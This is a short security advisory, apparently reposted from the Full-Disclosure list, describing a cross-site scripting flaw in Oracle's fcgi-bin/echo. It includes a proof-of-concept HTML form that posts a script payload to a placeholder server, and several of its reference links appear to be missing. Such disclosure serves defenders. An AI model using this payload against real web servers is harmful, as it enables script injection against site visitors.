Oracle fcgi-bin/echo Cross Site Scripting

Credit: Paul Szabo
Risk: Low
Local: No
Remote: Yes

Long ago, I wrote about an XSS vulnerability in Oracle fcgi-bin/echo : The issue may now be fixed in the latest versions of Oracle web servers: So I now release the PoC for this vulnerability: <form action="http://server/fcgi-bin/echo" method=post enctype="multipart/form-data"> <input type=text name=xss size=50 value="<script>alert('XSS')</script>"><br> <input type=submit value="send"> </form> The "traditional" form of a similar vulnerability is claimed to have been fixed long ago, maybe in However that never was actually fixed by Oracle, but was fixed by browsers that %-encode the query. Another interesting reference: Cheers, Paul Szabo School of Mathematics and Statistics University of Sydney Australia _______________________________________________ Full-Disclosure - We believe in it. Charter: Hosted and sponsored by Secunia -

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top